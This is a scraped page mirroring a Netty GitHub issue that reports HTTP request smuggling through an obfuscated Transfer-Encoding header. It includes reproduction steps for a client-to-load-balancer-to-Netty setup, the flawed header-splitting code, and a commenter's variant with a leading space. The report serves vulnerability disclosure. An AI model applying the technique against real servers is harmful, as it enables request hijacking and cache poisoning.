Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

http request smuggling, cause by obfuscating TE header

See original GitHub issue

Expected behavior

ignore obfuscating TE header(“Transfer-Encoding : chunked” vs “Transfer-Encoding: chunked”)

Actual behavior

use Transfer-Encoding[space] as Transfer-Encoding

Steps to reproduce

1、topology: client→elb→nettyServer 2、client send a request with both content-length and trunked-encoded[space] 3、elb ignored trunked-encoded[space], but use content-length 4、netty use trunked-encoded[space]

Minimal yet complete reproducer code (or URL to code)

when header field end with space but not colon, shoud the space be ignored? can not found proof in https://greenbytes.de/tech/webdav/rfc7230.html#header.fields.

code in io.netty.handler.codec.http.HttpObjectDecoder#splitHeader

for (nameEnd = nameStart; nameEnd < length; nameEnd ++) {
            char ch = sb.charAt(nameEnd);
            if (ch == ':' || <font color="#dd0000">Character.isWhitespace(ch)</font>) {
                break;
            }
 }

Netty version

all

JVM version (e.g. `java -version`)

OS version (e.g. `uname -a`)

Issue Analytics

State:
Created 4 years ago
Comments:37 (21 by maintainers)

Top GitHub Comments

5reactions

normanmaurercommented, Nov 9, 2019

No… 3.x is end of Life forever

Am 09.11.2019 um 01:20 schrieb Moncef Ben-Soula notifications@github.com:

Question, will / could there be fix for the 3.10.6 version coming out as well?

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or unsubscribe.

1reaction

fabianedl777commented, Jan 16, 2020

Hi,

I am using spring webflux 2.2.2.RELEASE with netty 4.1.43.Final, in an application that has 2 instances and is deployed in kubernetes and I have found this vulnerability when the TE is the first header and this header has a blank before the header name for example [space] Transfer-Encoding: chunked; reviewing the source code on the next line https://github.com/netty/netty/blob/8494b046ec7e4f28dbd44bc699cc4c4c92251729/codec-http/src/main/java/io/netty/handler/codec/http/HttpObjectDecoder.java#L766 , blanks at the beginning of the header are excluded and for this reason the request continues and the vulnerability is subsequently presented; I ran this test on Akka Http and in this scenario he sends a 400 mentioning that the header name has an invalid name.

Thank you

Top Results From Across the Web

Lab: HTTP request smuggling, obfuscating the TE header

This lab involves a front-end and back-end server, and the two servers handle duplicate HTTP request headers in different ways. The front-end server...

HTTP Request Smuggling: Complete Guide to Attack Types ...

TE :TE smuggling attacks can occur when both the frontend and backend prioritize the TE header. Attackers can insert two TE headers, with...

What Is HTTP Request Smuggling? | Attack Examples - Imperva

An HTTP request smuggling vulnerability occurs when an attacker sends both headers in a single request. This can cause either the front-end or...

A Pentester's Guide to HTTP Request Smuggling - Cobalt.io

HTTP request smuggling, obfuscating the TE header ... Smuggle a request to the back-end server and observe that the next request processed by...

HTTP Request Smuggling - Application Security Cheat Sheet

This leaves the back-end socket poisoned with G . When the legitimate request arrives, it ends up appended onto the G , causing...